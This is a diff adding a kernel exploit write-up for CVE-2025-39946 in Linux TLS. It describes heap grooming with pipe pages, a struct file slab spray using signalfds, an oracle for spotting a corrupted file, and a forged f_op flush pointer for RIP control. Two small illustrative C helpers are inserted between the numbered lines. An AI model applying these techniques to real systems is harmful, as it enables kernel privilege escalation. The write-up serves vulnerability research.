|
| 1 | +# CVE-2025-39946 |
| 2 | + |
| 3 | +Exploit documentation for `CVE-2025-39946` against `mitigation-v3b-6.1.55`. |
| 4 | + |
| 5 | +As stated in the `vulnerability.md` documentation, the bug behind |
| 6 | +`CVE-2025-39946` causes use of uninitialized data and potentially out-of-bounds |
| 7 | +accesses. For exploitation we will focus on the uninitialized data in the |
| 8 | +`struct skb_shared_info.frags[]` array. |
| 9 | +TLS manages the first 5 fragments for internal use; however, fragments after |
| 10 | +that are accessible to us because of the bug described. |
| 11 | +In order to exploit this, we will first groom the heap so that the next fragment |
| 12 | +has some controlled value. We then try to re-use this fragment page so that we |
| 13 | +can trigger a page write corrupting kernel data. |
| 14 | + |
| 15 | +## Page Write Targets |
| 16 | + |
| 17 | +With the primitive outlined above (essentially a one-shot use-after-free page |
| 18 | +write primitive), we need to find a useful page to write to. |
| 19 | +There are two obvious choices for this: |
| 20 | +- Page tables |
| 21 | +- Slab backing pages |
| 22 | + |
| 23 | +At the time of working on the exploit, page tables seemed to be too unstable due |
| 24 | +to the one-shot nature of the write, which is why we will continue with the slab |
| 25 | +backing pages. In hindsight, page tables were probably a good fit too. |
| 26 | + |
| 27 | +Which slab do we target? Ideally the slab would contain objects that allow |
| 28 | +trivial code execution or other memory write primitives. Additionally, the |
| 29 | +objects for the slab should be allocatable without too much noise in other |
| 30 | +slabs, because we do not want to accidentally corrupt another slab. |
| 31 | +Finally, we need to ensure that the same pages used for the slab can be allocated |
| 32 | +for skb fragments. |
| 33 | + |
| 34 | +Considering all of the above, we went for `struct file` objects: |
| 35 | +- They can be allocated rather easily by opening files, and we can allocate a |
| 36 | + large number of them. |
| 37 | +- Files are allocated from a dedicated `kmem_cache`, so we are sure to corrupt |
| 38 | + only file objects, which aids stability. |
| 39 | +- Files contain an `f_op` vtable, allowing direct RIP control. |
| 40 | +- File slabs are backed by order 0 pages, which can be allocated easily from |
| 41 | + userspace using pipes. |
| 42 | + |
| 43 | +One downside of files is that we cannot allocate them in isolation: every |
| 44 | +file allocation also results in the allocation of a `struct dentry`. This is a |
| 45 | +problem because it essentially means our page write might accidentally hit a |
| 46 | +different slab. |
| 47 | + |
| 48 | +## Heap Grooming |
| 49 | + |
| 50 | +In order to get a fragment at the right position we want to have skbs with 6 |
| 51 | +fragments, so that the last fragment can be picked up by the file slab. |
| 52 | +To get the controlled fragments into an skb, we create pipes and fill exactly 5 |
| 53 | +pages. Pipe buffers are backed by order 0 pages which matches the file slab |
| 54 | +`kmem_cache` order. After that we add another partially filled page which will |
| 55 | +be the page used for triggering the overwrite. |
| 56 | +We then splice those pages onto an skb for the expected fragment layout. |
| 57 | + |
| 58 | +The final page needs to be partially filled so that there is some space left to |
| 59 | +write. We will fill the page exactly to the alignment of the `struct file` |
| 60 | +objects in the slab. Thus the next write starts at the next `struct file` |
| 61 | +object, and will corrupt all the files in the rest of the slab. |
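
The pipe layout described above (5 full pages plus one partially filled page) can be sketched as follows. This is only an illustration under stated assumptions: a 4096-byte page, a hypothetical 256-byte slot size for `struct file` (the real value depends on the kernel build), and the illustrative helper names `partial_fill_len` and `fill_pipe`, none of which are taken from the exploit source. The splice onto the skb is not shown.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>

#define PAGE_SZ 4096u /* assumption: 4 KiB pages */

/*
 * Bytes to place in the final page so that the next write starts at
 * slot `first_slot` (1-based count of slots to skip) of a page that is
 * divided into `slot_size`-byte objects.
 */
static size_t partial_fill_len(size_t slot_size, size_t first_slot)
{
    assert(slot_size > 0 && slot_size <= PAGE_SZ);
    assert(first_slot >= 1);
    size_t len = slot_size * first_slot;
    assert(len < PAGE_SZ); /* some space must remain in the page */
    return len;
}

/*
 * Write `full_pages` whole pages followed by `tail_len` bytes into the
 * pipe. Each page-sized write to the pipe occupies its own pipe buffer
 * page. Returns 0 on success, -1 on a short or failed write.
 */
static int fill_pipe(int wfd, size_t full_pages, size_t tail_len)
{
    char page[PAGE_SZ];

    assert(tail_len < PAGE_SZ);
    memset(page, 'A', sizeof(page));
    for (size_t i = 0; i < full_pages; i++)
        if (write(wfd, page, PAGE_SZ) != (ssize_t)PAGE_SZ)
            return -1;
    if (tail_len > 0 && write(wfd, page, tail_len) != (ssize_t)tail_len)
        return -1;
    return 0;
}
```

With the assumed 256-byte slot, `fill_pipe(wfd, 5, partial_fill_len(256, 1))` queues 5 full pages and a sixth page filled up to the start of the second slot. The default pipe capacity of 16 pages is enough for this to complete without blocking.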
| 62 | + |
| 63 | +For increased chance of hitting the right pages, we will repeat the above for |
| 64 | +N (= 16) pipes. We fill all of them and then release the skbs one by one, |
| 65 | +immediately picking each up with a new `struct tls_strparser`. Since the last |
| 66 | +freed object will be the first on the freelist, it is very likely that the TLS |
| 67 | +socket picks up the prepared skb. |
| 68 | + |
| 69 | +## File Slab Spray |
| 70 | + |
| 71 | +Now that each TLS socket is readily equipped with a prepared skb, we want to |
| 72 | +spray file slabs so that new slabs will pick up pages that were released from |
| 73 | +the pipe buffers earlier. |
| 74 | +For the files to allocate, we choose `signalfd`s. Those are a decent choice |
| 75 | +because they are rather simple, with a small context, so that we do not |
| 76 | +allocate new slabs except for the `file` and the `dentry` slab. Furthermore, |
| 77 | +`signalfd`s provide an easy-to-use oracle ([1]) allowing us to check whether we |
| 78 | +corrupted the file structure. |
| 79 | + |
| 80 | +```c |
| 81 | +static int do_signalfd4(int ufd, sigset_t *mask, int flags) |
| 82 | +{ |
| 83 | + struct signalfd_ctx *ctx; |
| 84 | + |
| 85 | + /* ... */ |
| 86 | + |
| 87 | + if (ufd == -1) { |
| 88 | + /* ... */ |
| 89 | + } else { |
| 90 | + struct fd f = fdget(ufd); |
| 91 | + if (!f.file) |
| 92 | + return -EBADF; |
| 93 | + ctx = f.file->private_data; |
| 94 | + if (f.file->f_op != &signalfd_fops) { // [1] |
| 95 | + fdput(f); |
| 96 | + return -EINVAL; |
| 97 | + } |
| 98 | + /* ... */ |
| 99 | +} |
| 100 | +``` |
| 101 | +
|
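
From userspace, the check at [1] can be reached by calling `signalfd()` on an existing descriptor. The following is a minimal sketch of such a probe, not the exploit's own code; the helper name `still_signalfd` is hypothetical. Note that a successful call also replaces the descriptor's signal mask, so the sketch assumes the probe mask is acceptable for the sprayed descriptors.

```c
#include <errno.h>
#include <signal.h>
#include <stdbool.h>
#include <sys/signalfd.h>

/*
 * Returns true if the kernel still treats `fd` as a signalfd.
 * signalfd(2) on an existing descriptor updates its mask and returns
 * the same descriptor; it fails with EINVAL when the file's f_op is
 * not signalfd_fops (the comparison marked [1]), or with EBADF when
 * the descriptor is not open at all.
 */
static bool still_signalfd(int fd)
{
    sigset_t mask;

    sigemptyset(&mask);
    sigaddset(&mask, SIGUSR1);
    return signalfd(fd, &mask, 0) == fd;
}
```

A descriptor for which this returns false while it is still open no longer carries the original `f_op` pointer.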
| 102 | +As mentioned earlier, we cannot prevent allocation of `dentry` slabs when
| 103 | +allocating `signalfd`s. To prevent kernel panics because of corrupted `dentry`s,
| 104 | +we spray the `signalfd`s in a dedicated forked process, which stays alive
| 105 | +indefinitely if we fail to find a corrupted file. This way we prevent any
| 106 | +accidental oops during cleanup.
| 107 | +
|
| 108 | +## Triggering the Bug for the Page Write |
| 109 | +
|
| 110 | +Now that we hopefully have a `signalfd` with a file in a slab backed by the page |
| 111 | +we placed into one of the skb fragments, we will trigger the bug as described in |
| 112 | +the `vulnerability.md` document and write our payload for each skb set up. |
| 113 | +
|
| 114 | +For the payload we opt for a simple, mostly empty file that has nothing but
| 115 | +an `f_op` table with a populated `flush` method and a reference count of 1.
| 116 | +When we close the file via `close()` we reach `filp_close()`,
| 117 | +which gives us RIP control.
| 118 | +The reference count does not need to be exactly 1; it just needs to be
| 119 | +greater than zero to bypass checks in `filp_close()`. Actually it is better to
| 120 | +choose a greater reference count to prevent the file destructor from running.
| 121 | +Since we will block the kernel in an infinite loop in our flush primitive, we do
| 122 | +not need to worry about that too much though.
| 123 | +
|
| 124 | +As a RIP gadget we will utilize the "one gadget" technique described in great |
| 125 | +detail in the [CVE-2025-21700 writeup](https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md). |
| 126 | +Also note that this gadget does not need a KASLR bypass. |
| 127 | +
|
| 128 | +To create the `struct file_operations` pointer we will resort to the previously |
| 129 | +documented deterministically known location of the exception stacks in the CPU |
| 130 | +entry area. This issue has been documented several times (CVE-2023-0597). |
| 131 | +
|
| 132 | +After each write completes, we check each `signalfd` using the oracle described
| 133 | +above. If any of them got corrupted we trigger our payload by closing the file |
| 134 | +descriptor. |
| 135 | +
|
| 136 | +## Stability Notes |
| 137 | +
|
| 138 | +Special care was taken to make the exploit repeatable if the page reclaim fails.
| 139 | +It should succeed in close to 80% of attempts.
| 140 | +As a side note, the usage of the "one gadget" actually helps with the page |
| 141 | +reclaim because it causes the PCP to drain, thus giving us more reliability in |
| 142 | +the page allocation. |
| 143 | +
|